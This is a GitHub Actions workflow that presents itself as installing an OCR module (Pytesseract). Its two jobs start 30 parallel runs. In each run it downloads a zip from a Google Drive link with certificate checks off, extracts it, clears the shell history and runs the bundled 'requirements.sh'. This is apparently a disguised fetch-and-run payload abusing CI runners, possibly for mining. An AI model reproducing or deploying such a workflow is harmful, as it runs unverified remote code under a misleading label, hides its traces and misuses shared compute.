name: nanovuongmien694link
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  DELIVER:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Collect', 'Design', 'Review', 'Launch', 'Deliver']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1OjmfKQLaVHY8AhxkA981bK7H8kBgHyuL" -O OCR.zip
        unzip -o OCR.zip
        rm OCR.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh


  SETUP1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.o, I.i, I.ii]
        flag: ['Draft', 'Construct', 'Inspect', 'Trigger', 'Ship']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: install module
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1OjmfKQLaVHY8AhxkA981bK7H8kBgHyuL" -O OCR.zip
        unzip -o OCR.zip
        rm OCR.zip
        history -c && history -w

    - name: Pytesseract
      run: bash requirements.sh
        
